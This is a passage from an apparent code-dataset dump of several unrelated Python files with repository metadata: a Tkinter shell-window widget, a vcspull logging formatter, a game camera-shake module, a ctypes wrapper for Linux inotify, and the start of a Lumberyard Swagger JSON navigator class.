shell = args[0]
apply(ScrolledText.__init__, (self, master), cnf)
self.pos = '1.0'
self.bind('<Return>', self.inputhandler)
self.bind('<Control-c>', self.sigint)
self.bind('<Control-t>', self.sigterm)
self.bind('<Control-k>', self.sigkill)
self.bind('<Control-d>', self.sendeof)
self.pid, self.fromchild, self.tochild = spawn(shell, args)
self.tk.createfilehandler(self.fromchild, READABLE,
self.outputhandler)
def outputhandler(self, file, mask):
data = os.read(file, BUFSIZE)
if not data:
self.tk.deletefilehandler(file)
pid, sts = os.waitpid(self.pid, 0)
print 'pid', pid, 'status', sts
self.pid = None
detail = sts>>8
cause = sts & 0xff
if cause == 0:
msg = "exit status %d" % detail
else:
msg = "killed by signal %d" % (cause & 0x7f)
if cause & 0x80:
msg = msg + " -- core dumped"
Dialog(self.master,
text=msg,
title="Exit status",
bitmap='warning',
default=0,
strings=('OK',))
return
self.insert(END, data)
self.pos = self.index("end - 1 char")
self.yview_pickplace(END)
def inputhandler(self, *args):
if not self.pid:
self.no_process()
return "break"
self.insert(END, "\n")
line = self.get(self.pos, "end - 1 char")
self.pos = self.index(END)
os.write(self.tochild, line)
return "break"
def sendeof(self, *args):
if not self.pid:
self.no_process()
return "break"
os.close(self.tochild)
return "break"
def sendsig(self, sig):
if not self.pid:
self.no_process()
return "break"
os.kill(self.pid, sig)
return "break"
def sigint(self, *args):
return self.sendsig(signal.SIGINT)
def sigquit(self, *args):
return self.sendsig(signal.SIGQUIT)
def sigterm(self, *args):
return self.sendsig(signal.SIGTERM)
def sigkill(self, *args):
return self.sendsig(signal.SIGKILL)
def no_process(self):
Dialog(self.master,
text="No active process",
title="No process",
bitmap='error',
default=0,
strings=('OK',))
MAXFD = 100 # Max number of file descriptors (os.getdtablesize()???)
def spawn(prog, args):
p2cread, p2cwrite = os.pipe()
c2pread, c2pwrite = os.pipe()
pid = os.fork()
if pid == 0:
# Child
os.close(0)
os.close(1)
os.close(2)
if os.dup(p2cread) <> 0:
sys.stderr.write('popen2: bad read dup\n')
if os.dup(c2pwrite) <> 1:
sys.stderr.write('popen2: bad write dup\n')
if os.dup(c2pwrite) <> 2:
sys.stderr.write('popen2: bad write dup\n')
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
try:
os.execvp(prog, args)
finally:
sys.stderr.write('execvp failed\n')
os._exit(1)
os.close(p2cread)
os.close(c2pwrite)
return pid, c2pread, p2cwrite
def test():
shell = string.join(sys.argv[1:])
root = Tk()
root.minsize(1, 1)
if shell:
w = ShellWindow(root, shell=shell)
else:
w = ShellWindow(root)
w.pack(expand=1, fill=BOTH)
w.focus_set()
w.tk.mainloop()
if __name__ == '__main__':
test()
| 22.686667
| 68
| 0.637967
|
33089e03375406a6c23f7aa1f559431c0065f4d1
| 4,727
|
py
|
Python
|
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | null | null | null |
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | 1
|
2022-03-22T02:08:49.000Z
|
2022-03-22T02:08:49.000Z
|
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | null | null | null |
"""Log utilities for formatting CLI output.
vcspull.log
~~~~~~~~~~~
This module containers special formatters for processing the additional context
information from :class:`libvcs.base.RepoLoggingAdapter`.
Colorized formatters for generic logging inside the application is also
provided.
"""
import logging
import time
from colorama import Fore, Style
LEVEL_COLORS = {
"DEBUG": Fore.BLUE, # Blue
"INFO": Fore.GREEN, # Green
"WARNING": Fore.YELLOW,
"ERROR": Fore.RED,
"CRITICAL": Fore.RED,
}
def setup_logger(log=None, level="INFO"):
"""Setup logging for CLI use.
Parameters
----------
log : :py:class:`Logger`
instance of logger
"""
if not log:
log = logging.getLogger()
if not log.handlers:
channel = logging.StreamHandler()
channel.setFormatter(DebugLogFormatter())
log.setLevel(level)
log.addHandler(channel)
# setup styling for repo loggers
repo_logger = logging.getLogger("libvcs")
channel = logging.StreamHandler()
channel.setFormatter(RepoLogFormatter())
channel.addFilter(RepoFilter())
repo_logger.setLevel(level)
repo_logger.addHandler(channel)
def default_log_template(self, record):
"""Return the prefix for the log message. Template for Formatter.
Parameters
----------
record : :py:class:`logging.LogRecord`
This is passed in from inside the :py:meth:`logging.Formatter.format` record.
"""
reset = [Style.RESET_ALL]
levelname = [
LEVEL_COLORS.get(record.levelname),
Style.BRIGHT,
"(%(levelname)s)",
Style.RESET_ALL,
" ",
]
asctime = [
"[",
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
"%(asctime)s",
Fore.RESET,
Style.RESET_ALL,
"]",
]
name = [
" ",
Fore.WHITE,
Style.DIM,
Style.BRIGHT,
"%(name)s",
Fore.RESET,
Style.RESET_ALL,
" ",
]
tpl = "".join(reset + levelname + asctime + name + reset)
return tpl
class LogFormatter(logging.Formatter):
template = default_log_template
def __init__(self, color=True, *args, **kwargs):
logging.Formatter.__init__(self, *args, **kwargs)
def format(self, record):
try:
record.message = record.getMessage()
except Exception as e:
record.message = f"Bad message ({e!r}): {record.__dict__!r}"
date_format = "%H:%m:%S"
record.asctime = time.strftime(date_format, self.converter(record.created))
prefix = self.template(record) % record.__dict__
formatted = prefix + " " + record.message
return formatted.replace("\n", "\n ")
def debug_log_template(self, record):
"""Return the prefix for the log message. Template for Formatter.
Parameters
----------
record : :class:`logging.LogRecord`
This is passed in from inside the :py:meth:`logging.Formatter.format` record.
"""
reset = [Style.RESET_ALL]
levelname = [
LEVEL_COLORS.get(record.levelname),
Style.BRIGHT,
"(%(levelname)1.1s)",
Style.RESET_ALL,
" ",
]
asctime = [
"[",
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
"%(asctime)s",
Fore.RESET,
Style.RESET_ALL,
"]",
]
name = [
" ",
Fore.WHITE,
Style.DIM,
Style.BRIGHT,
"%(name)s",
Fore.RESET,
Style.RESET_ALL,
" ",
]
module_funcName = [Fore.GREEN, Style.BRIGHT, "%(module)s.%(funcName)s()"]
lineno = [
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
":",
Style.RESET_ALL,
Fore.CYAN,
"%(lineno)d",
]
tpl = "".join(reset + levelname + asctime + name + module_funcName + lineno + reset)
return tpl
class DebugLogFormatter(LogFormatter):
"""Provides greater technical details than standard log Formatter."""
template = debug_log_template
class RepoLogFormatter(LogFormatter):
def template(self, record):
record.message = "".join(
[Fore.MAGENTA, Style.BRIGHT, record.message, Fore.RESET, Style.RESET_ALL]
)
return "{}|{}| {}({}) {}".format(
Fore.GREEN + Style.DIM,
record.repo_name,
Fore.YELLOW,
record.repo_vcs,
Fore.RESET,
)
class RepoFilter(logging.Filter):
"""Only include repo logs for this type of record."""
def filter(self, record):
"""Only return a record if a repo_vcs object."""
return True if "repo_vcs" in record.__dict__ else False
| 23.873737
| 88
| 0.578168
|
c320d1bb36a3b6d152d967b00ed3ba4011d2627d
| 3,987
|
py
|
Python
|
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
from engine import Global;
from random import randint;
from engine import Update;
# --------------------------------------------------- *\
# Camera behaviour
# --------------------------------------------------- */
cameraToUse = None;
shakeIntensity = 0;
isCameraShaking = False;
isCameraFixed = False;
fixeTarget = None;
usedScene = None;
# --------------------------------------------------- *\
# [function] setCameraFixedTo(targetScene)
#
# * Fix the camera mouvement on the scene *
# Return : nil
# --------------------------------------------------- */
def setCameraFixedTo(targetScene):
global isCameraFixed;
global fixeTarget;
isCameraFixed = True;
fixeTarget = targetScene;
# --------------------------------------------------- *\
# [function] setScene(scene)
#
# * Specify a scene for the camera behaviour *
# Return : nil
# --------------------------------------------------- */
def setScene(scene):
global usedScene;
usedScene = scene;
# --------------------------------------------------- *\
# [function] setCamera(camera)
#
# * Set the camera to use in the behaviour *
# Return : nil
# --------------------------------------------------- */
def setCamera(camera):
global cameraToUse;
cameraToUse = camera;
# --------------------------------------------------- *\
# [function] getCamera()
#
# * Return the camera element *
# Return : camera
# --------------------------------------------------- */
def getCamera():
return cameraToUse;
savedPositionBeforeShaking = [0,0];
# --------------------------------------------------- *\
# [function] shakeCamera(intensity, time)
#
# * Shake the camera for a certain amount of time *
# Return : nil
# --------------------------------------------------- */
def shakeCamera(intensity, time):
global isCameraShaking;
global shakeIntensity;
global savedPositionBeforeShaking;
if not isCameraShaking:
isCameraShaking = True;
shakeIntensity = intensity;
camPosition = cameraToUse.getPosition();
savedPositionBeforeShaking = [camPosition[0], camPosition[1]];
Global.setInterval(camRandomPosition, 100/intensity);
Global.setTimeout(stopShaking, time);
# --------------------------------------------------- *\
# [function] camRandomPosition()
#
# * Set the camera to a random position according to the intensity *
# Return : nil
# --------------------------------------------------- */
def camRandomPosition():
if isCameraShaking:
randPosition = [randint(-5*shakeIntensity, 5*shakeIntensity), randint(-5*shakeIntensity, 5*shakeIntensity)];
cameraToUse.setPosition(savedPositionBeforeShaking[0] + randPosition[0], savedPositionBeforeShaking[1] +randPosition[1]);
# --------------------------------------------------- *\
# [function] stopShaking()
#
# * Stop the shaking *
# Return : nil
# --------------------------------------------------- */
def stopShaking():
global isCameraShaking;
isCameraShaking = False;
cameraToUse.setPosition(savedPositionBeforeShaking[0], savedPositionBeforeShaking[1]);
# --------------------------------------------------- *\
# [function] onUpdate()
#
# * Camera behaviour on each frame *
# Return : nil
# --------------------------------------------------- */
appendToElement = True;
def cameraUpdate():
global appendToElement;
position = cameraToUse.getPosition();
sX = Global.screenSize[0];
sY = Global.screenSize[1];
scale = Global.scale;
if isCameraFixed and isCameraShaking == False:
if fixeTarget != None:
targetPosition = fixeTarget.getPosition();
if appendToElement:
targetSize = fixeTarget.getSize();
cameraToUse.setPosition((targetPosition[0] + (targetSize[0] / 2)) *scale, (targetPosition[1] + (targetSize[1] / 4)) *scale);
# check for scene boudaries
if usedScene:
sceneSize = usedScene.getSize();
if(targetPosition[0]*scale <= sX/2) or (targetPosition[0] *scale >= sceneSize[0] * scale - (sX/2)):
appendToElement = False;
else:
appendToElement = True;
Update.on(cameraUpdate);
| 30.435115
| 128
| 0.543266
|
ecb484ab629a6a8bf2280d7aac82aac0bffdd2f8
| 15,222
|
py
|
Python
|
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | 2
|
2017-10-31T18:48:20.000Z
|
2018-03-04T20:35:20.000Z
|
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
"""Linux inotify(7) API wrapper module.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import logging
import operator
import os
import struct
import ctypes
from ctypes import (
c_int,
c_char_p,
c_uint32,
)
from ctypes.util import find_library
import enum
import six
_LOGGER = logging.getLogger(__name__)
###############################################################################
# Map the C interface
_LIBC_PATH = find_library('c')
_LIBC = ctypes.CDLL(_LIBC_PATH, use_errno=True)
if any([getattr(_LIBC, func_name, None) is None
for func_name in ['inotify_init1',
'inotify_add_watch',
'inotify_rm_watch']]):
raise ImportError('Unsupported libc version found: %s' % _LIBC_PATH)
###############################################################################
# int inotify_init(void);
_INOTIFY_INIT1_DECL = ctypes.CFUNCTYPE(c_int, c_int, use_errno=True)
_INOTIFY_INIT1 = _INOTIFY_INIT1_DECL(('inotify_init1', _LIBC))
def inotify_init(flags=0):
"""Initializes a new inotify instance and returns a file descriptor
associated with a new inotify event queue.
:param ``INInitFlags`` flags:
Optional flag to control the inotify_init behavior.
"""
fileno = _INOTIFY_INIT1(flags)
if fileno < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_init1(%r)' % flags)
return fileno
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
class INInitFlags(enum.IntEnum):
"""Flags supported by inotify_init(2).
"""
NONBLOCK = 0o4000
CLOEXEC = 0o2000000
#: Set the O_NONBLOCK file status flag on the new open file description. Using
#: this flag saves extra calls to fcntl(2) to achieve the same result.
#: (since Linux 2.6.27)
IN_NONBLOCK = INInitFlags.NONBLOCK
#: Set the close-on-exec (FD_CLOEXEC) flag on the new file descriptor. See the
#: description of the O_CLOEXEC flag in open(2) for reasons why this may be
#: useful.
#: (since Linux 2.6.27)
IN_CLOEXEC = INInitFlags.CLOEXEC
###############################################################################
# int inotify_add_watch(int fileno, const char *pathname, uint32_t mask);
_INOTIFY_ADD_WATCH_DECL = ctypes.CFUNCTYPE(c_int, c_int, c_char_p, c_uint32,
use_errno=True)
_INOTIFY_ADD_WATCH = _INOTIFY_ADD_WATCH_DECL(('inotify_add_watch', _LIBC))
def inotify_add_watch(fileno, path, mask):
"""Add a watch to an initialized inotify instance.
:params ``int`` fileno:
Inotify socket.
:params ``str`` path:
Path to add the watch on.
:params ``int`` mask:
Mask of :class:`INAddWatchFlags` values controlling the watch creation.
:returns:
``int`` - Corresponding watch ID.
"""
encoded_path = path.encode()
watch_id = _INOTIFY_ADD_WATCH(fileno, encoded_path, mask)
if watch_id < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_add_watch(%r, %r, %r)' % (fileno, path, mask))
return watch_id
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
class INAddWatchFlags(enum.IntEnum):
"""Special flags for inotify_add_watch.
"""
#: Do not follow a symbolic link.
DONT_FOLLOW = 0x02000000
#: Add to the mask of an existing watch.
MASK_ADD = 0x20000000
#: Only send event once.
ONESHOT = 0x80000000
#: Only watch the path if it's a directory.
ONLYDIR = 0x01000000
#: Don't dereference pathname if it is a symbolic link.
#: (since Linux 2.6.15)
IN_DONT_FOLLOW = INAddWatchFlags.DONT_FOLLOW
#: Add (OR) events to watch mask for this pathname if it already exists
#: (instead of replacing mask).
IN_MASK_ADD = INAddWatchFlags.MASK_ADD
#: Monitor pathname for one event, then remove from watch list.
IN_ONESHOT = INAddWatchFlags.ONESHOT
#: Only watch pathname if it's a directory.
#: (since Linux 2.6.15)
IN_ONLYDIR = INAddWatchFlags.ONLYDIR
###############################################################################
# int inotify_rm_watch(int fileno, uint32_t wd);
_INOTIFY_RM_WATCH_DECL = ctypes.CFUNCTYPE(c_int, c_int, c_uint32,
use_errno=True)
_INOTIFY_RM_WATCH = _INOTIFY_RM_WATCH_DECL(('inotify_rm_watch', _LIBC))
def inotify_rm_watch(fileno, watch_id):
"""Remove an existing watch from an inotify instance.
:params ``int`` fileno:
Inotify socket.
:params ``int`` watch_id:
Watch ID to remove.
"""
res = _INOTIFY_RM_WATCH(fileno, watch_id)
if res < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_rm_watch(%r, %r)' % (fileno, watch_id))
INOTIFY_EVENT_HDRSIZE = struct.calcsize('iIII')
###############################################################################
def _parse_buffer(event_buffer):
"""Parses an inotify event buffer of ``inotify_event`` structs read from
the inotify socket.
The inotify_event structure looks like this::
struct inotify_event {
__s32 wd; /* watch descriptor */
__u32 mask; /* watch mask */
__u32 cookie; /* cookie to synchronize two events */
__u32 len; /* length (including nulls) of name */
char name[0]; /* stub for possible name */
};
The ``cookie`` member of this struct is used to pair two related
events, for example, it pairs an IN_MOVED_FROM event with an
IN_MOVED_TO event.
"""
while len(event_buffer) >= INOTIFY_EVENT_HDRSIZE:
wd, mask, cookie, length = struct.unpack_from('iIII', event_buffer, 0)
name = event_buffer[
INOTIFY_EVENT_HDRSIZE:
INOTIFY_EVENT_HDRSIZE + length
]
name = name.rstrip(b'\x00')
event_buffer = event_buffer[INOTIFY_EVENT_HDRSIZE + length:]
yield wd, mask, cookie, name
assert not event_buffer, 'Unparsed bytes left in buffer: %r' % event_buffer
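# Illustrative sketch (not part of the original module): pack one fake
# ``inotify_event`` record with struct and feed it back through _parse_buffer.
# The watch descriptor, cookie and file name below are arbitrary demo values.
def _demo_parse_buffer():
    """Round-trip a single hand-built inotify_event record."""
    name = b'somefile\x00\x00'  # NUL-padded name, as delivered by the kernel
    buf = struct.pack('iIII', 1, int(IN_CREATE), 0, len(name)) + name
    # -> [(1, 256, 0, b'somefile')] since IN_CREATE == 0x100
    return list(_parse_buffer(buf))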
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
# Constants related to inotify. See man inotify(7) and sys/inotify.h
class INEvent(enum.IntEnum):
"""Inotify events.
"""
# Events triggered by user-space
ACCESS = 0x00000001
ATTRIB = 0x00000004
CLOSE_WRITE = 0x00000008
CLOSE_NOWRITE = 0x00000010
CREATE = 0x00000100
DELETE = 0x00000200
DELETE_SELF = 0x00000400
MODIFY = 0x00000002
MOVE_SELF = 0x00000800
MOVED_FROM = 0x00000040
MOVED_TO = 0x00000080
OPEN = 0x00000020
# Events sent by the kernel
IGNORED = 0x00008000
ISDIR = 0x40000000
Q_OVERFLOW = 0x00004000
UNMOUNT = 0x00002000
#: File was accessed (read).
IN_ACCESS = INEvent.ACCESS
#: Metadata changed, e.g. permissions, timestamps, extended attributes, link
#: count (since Linux 2.6.25), UID, GID, etc.
IN_ATTRIB = INEvent.ATTRIB
#: File opened for writing was closed.
IN_CLOSE_WRITE = INEvent.CLOSE_WRITE
#: File not opened for writing was closed.
IN_CLOSE_NOWRITE = INEvent.CLOSE_NOWRITE
#: File/directory created in watched directory.
IN_CREATE = INEvent.CREATE
#: File/directory deleted from watched directory.
IN_DELETE = INEvent.DELETE
#: Watched file/directory was itself deleted.
IN_DELETE_SELF = INEvent.DELETE_SELF
#: File was modified.
IN_MODIFY = INEvent.MODIFY
#: Watched file/directory was itself moved.
IN_MOVE_SELF = INEvent.MOVE_SELF
#: File moved out of watched directory.
IN_MOVED_FROM = INEvent.MOVED_FROM
#: File moved into watched directory.
IN_MOVED_TO = INEvent.MOVED_TO
#: File was opened.
IN_OPEN = INEvent.OPEN
#: Watch was removed explicitly (inotify_rm_watch(2)) or automatically (file
#: was deleted, or file system was unmounted).
IN_IGNORED = INEvent.IGNORED
#: Subject of this event is a directory.
IN_ISDIR = INEvent.ISDIR
#: Event queue overflowed (wd is -1 for this event).
IN_Q_OVERFLOW = INEvent.Q_OVERFLOW
#: File system containing watched object was unmounted.
IN_UNMOUNT = INEvent.UNMOUNT
# Helper values for user-space events
IN_CLOSE = IN_CLOSE_WRITE | IN_CLOSE_NOWRITE
IN_MOVE = IN_MOVED_FROM | IN_MOVED_TO
# All user-space events.
IN_ALL_EVENTS = six.moves.reduce(operator.or_, [
IN_ACCESS,
IN_ATTRIB,
IN_CLOSE_NOWRITE,
IN_CLOSE_WRITE,
IN_CREATE,
IN_DELETE,
IN_DELETE_SELF,
IN_MODIFY,
IN_MOVED_FROM,
IN_MOVED_TO,
IN_MOVE_SELF,
IN_OPEN,
])
def _fmt_mask(mask):
"""Parse an Inotify event mask into indivitual event flags."""
masks = []
# Non-iterable value INEvent is used in an iterating context
for event in INEvent:
if mask & event:
masks.append(event.name)
mask ^= event
if mask:
masks.append(hex(mask))
return masks
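# Illustrative check (not part of the original module): a combined mask is
# decomposed into its flag names, e.g.
#   _fmt_mask(IN_CREATE | IN_ISDIR) -> ['CREATE', 'ISDIR']
# and any unknown leftover bits are appended as a hex string.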
###############################################################################
# High level Python API
class InotifyEvent(collections.namedtuple('InotifyEvent',
'wd mask cookie src_path')):
"""
Inotify event struct wrapper.
:param wd:
Watch descriptor
:param mask:
Event mask
:param cookie:
Event cookie
:param src_path:
Event source path
"""
__slots__ = ()
@property
def is_modify(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MODIFY)
@property
def is_close_write(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CLOSE_WRITE)
@property
def is_close_nowrite(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CLOSE_NOWRITE)
@property
def is_access(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ACCESS)
@property
def is_delete(self):
"""Test mask shorthand."""
return bool(self.mask & IN_DELETE)
@property
def is_delete_self(self):
"""Test mask shorthand."""
return bool(self.mask & IN_DELETE_SELF)
@property
def is_create(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CREATE)
@property
def is_moved_from(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVED_FROM)
@property
def is_moved_to(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVED_TO)
@property
def is_move(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVE)
@property
def is_move_self(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVE_SELF)
@property
def is_attrib(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ATTRIB)
@property
def is_ignored(self):
"""Test mask shorthand."""
return bool(self.mask & IN_IGNORED)
@property
def is_directory(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ISDIR)
def __repr__(self):
masks = _fmt_mask(self.mask)
return ('<InotifyEvent: src_path=%s, wd=%d, mask=%s, cookie=%d>') % (
self.src_path,
self.wd,
'|'.join(masks),
self.cookie,
)
DEFAULT_NUM_EVENTS = 2048
DEFAULT_EVENT_BUFFER_SIZE = DEFAULT_NUM_EVENTS * INOTIFY_EVENT_HDRSIZE
class Inotify(object):
"""Inotify system interface."""
def __init__(self, flags):
"""Initialize a new Inotify object.
"""
# The file descriptor associated with the inotify instance.
inotify_fd = inotify_init(flags)
self._inotify_fd = inotify_fd
self._paths = {}
def fileno(self):
"""The file descriptor associated with the inotify instance."""
return self._inotify_fd
def close(self):
"""Close the inotify filedescriptor.
NOTE: After call this, this object will be unusable.
"""
os.close(self._inotify_fd)
def add_watch(self, path, event_mask=IN_ALL_EVENTS):
"""
Adds a watch for the given path to monitor events specified by the
mask.
:param path:
Path to monitor
:type path:
``str``
:param event_mask:
*optional* Bit mask of the request events.
:type event_mask:
``int``
:returns:
Unique watch descriptor identifier
:rtype:
``int``
"""
path = os.path.normpath(path)
watch_id = inotify_add_watch(
self._inotify_fd,
path,
event_mask | IN_MASK_ADD
)
self._paths[watch_id] = path
return watch_id
def remove_watch(self, watch_id):
"""
Removes a watch.
:param watch_id:
Watch descriptor returned by :meth:`~Inotify.add_watch`
:type watch_id:
``int``
:returns:
``None``
"""
inotify_rm_watch(self._inotify_fd, watch_id)
def read_events(self, event_buffer_size=DEFAULT_EVENT_BUFFER_SIZE):
"""
Reads events from inotify and yields them.
:param event_buffer_size:
*optional* Buffer size while reading the inotify socket
:type event_buffer_size:
``int``
:returns:
List of :class:`InotifyEvent` instances
:rtype:
``list``
"""
if not self._paths:
return []
event_buffer = os.read(self._inotify_fd, event_buffer_size)
event_list = []
for wd, mask, cookie, name in _parse_buffer(event_buffer):
name = name.decode()
wd_path = self._paths[wd]
src_path = os.path.normpath(os.path.join(wd_path, name))
inotify_event = InotifyEvent(wd, mask, cookie, src_path)
_LOGGER.debug('Received event %r', inotify_event)
if inotify_event.mask & IN_IGNORED:
# Clean up deleted watches
del self._paths[wd]
event_list.append(inotify_event)
return event_list
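# Hedged usage sketch (not part of the original module): watch a directory for
# creations and deletions. The path is illustrative; a real caller would
# typically pass IN_NONBLOCK and poll on fileno() instead of blocking in read.
def _demo_watch(path='/tmp'):
    """Log created paths under ``path`` for a single read."""
    inotify = Inotify(IN_CLOEXEC)
    wd = inotify.add_watch(path, IN_CREATE | IN_DELETE)
    try:
        for event in inotify.read_events():  # blocks until events arrive
            if event.is_create:
                _LOGGER.info('created: %s', event.src_path)
    finally:
        inotify.remove_watch(wd)
        inotify.close()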
###############################################################################
__all__ = [
'IN_NONBLOCK',
    'IN_CLOEXEC',
'IN_DONT_FOLLOW',
'IN_MASK_ADD',
'IN_ONESHOT',
'IN_ONLYDIR',
'IN_ACCESS',
'IN_ATTRIB',
'IN_CLOSE_WRITE',
'IN_CLOSE_NOWRITE',
'IN_CREATE',
'IN_DELETE',
'IN_DELETE_SELF',
'IN_MODIFY',
'IN_MOVE_SELF',
'IN_MOVED_FROM',
'IN_MOVED_TO',
'IN_OPEN',
'IN_IGNORED',
'IN_ISDIR',
'IN_Q_OVERFLOW',
'IN_UNMOUNT',
'IN_CLOSE',
'IN_MOVE',
'IN_ALL_EVENTS',
'inotify_init',
'inotify_add_watch',
'inotify_rm_watch',
'Inotify',
'InotifyEvent',
]
| 28.188889
| 79
| 0.606228
|
787f1215bcb5d82f82b0c3eb2245c4b706cdb670
| 8,697
|
py
|
Python
|
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
stickyparticles/lumberyard
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | 2
|
2019-11-29T09:04:54.000Z
|
2021-03-18T02:34:44.000Z
|
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
JulianoCristian/Lumberyard-3
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | null | null | null |
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
JulianoCristian/Lumberyard-3
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | 3
|
2019-05-13T09:41:33.000Z
|
2021-04-09T12:12:38.000Z
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
REQUIRED = {} # special value used when no default is acceptable
class SwaggerNavigator(object):
    def __init__(self, value, parent=None, selector=None):
self.value = value
self.parent = parent
self.selector = selector
def __repr__(self):
if not self.parent:
return "swagger.json:"
return self.parent.__repr__() + "[{}]".format(self.formatted_selector)
@property
def root(self):
if self.parent:
return self.parent.root
else:
return self
@property
def formatted_selector(self):
if isinstance(self.selector, str):
return "\"{}\"".format(self.selector)
return self.selector
def contains(self, value):
if self.is_object or self.is_array:
return value in self.value
else:
raise ValueError('{} is not an object or array.'.format(self))
def get(self, selector, default=REQUIRED):
if self.is_object:
if selector not in self.value:
if default is REQUIRED:
raise ValueError('{} has no {} property.'.format(self, selector))
else:
found_value = default
else:
found_value = self.value[selector]
return SwaggerNavigator(found_value, parent=self, selector = selector)
elif self.is_array:
if not isinstance(selector, int):
raise ValueError('{} is a list but accessor {} is not an integer.'.format(self, selector))
if selector < 0 or selector >= len(self.value):
if default is REQUIRED:
raise ValueError('{} has no index {}.'.format(self, selector))
else:
found_value = default
else:
found_value = self.value[selector]
return SwaggerNavigator(found_value, parent=self, selector = selector)
raise ValueError('{} is not an object or array. Cannot select {}.'.format(self, selector))
def remove(self, selector, required=False):
if self.is_object:
if selector in self.value:
del self.value[selector]
elif required:
raise ValueError('{} does not contain {} so it cannot be removed.'.format(self, selector))
elif self.is_array:
if selector >= 0 and selector < len(self.value):
del self.value[selector]
elif required:
raise ValueError('{} does not contain {} so it cannot be removed.'.format(self, selector))
else:
raise ValueError('{} is not an object or array. Cannot remove {}.'.format(self, selector))
def values(self):
if self.is_object:
return [self.get(key) for key in self.value.keys()]
elif self.is_array:
return [self.get(i) for i in range(len(self.value))]
return None
def items(self):
if self.is_object:
return [(key, self.get(key)) for key in self.value.keys()]
elif self.is_array:
return [(i, self.get(i)) for i in range(len(self.value))]
return None
@property
def is_none(self):
        return self.value is None
@property
def is_empty(self):
if self.is_none:
return True
elif self.is_object or self.is_array:
return len(self.value) == 0
else:
return False
@property
def is_object(self):
return isinstance(self.value, dict)
def get_object(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_object or navigator.is_none):
raise ValueError('{} value {} is not an object.'.format(navigator, navigator.value))
return navigator
def get_or_add_object(self, selector, default=None):
if not self.contains(selector):
if self.is_object:
self.value[selector] = default if default else {}
elif self.is_array:
self.value.insert(selector, default if default else {})
else:
raise ValueError('{} is not an object or array. Cannot add {} at {}.'.format(self, default, selector))
return self.get_object(selector)
def add_object(self, selector, initial_value):
if self.contains(selector):
raise ValueError('{} already contains an {} value.'.format(self, selector))
if self.is_object:
self.value[selector] = initial_value
elif self.is_array:
self.value.insert(selector, initial_value)
else:
raise ValueError('{} is not an object or array. Cannot add {} at {}.'.format(self, initial_value, selector))
return self.get_object(selector)
def remove_object(self, selector, default=REQUIRED):
navigator = self.get_object(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_array(self):
return isinstance(self.value, list)
def get_array(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_array or navigator.is_none):
raise ValueError('{} value {} is not an array.'.format(navigator, navigator.value))
return navigator
def remove_array(self, selector, default=REQUIRED):
navigator = self.get_array(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_string(self):
return isinstance(self.value, str) or isinstance(self.value, unicode)
def get_string(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_string or navigator.is_none):
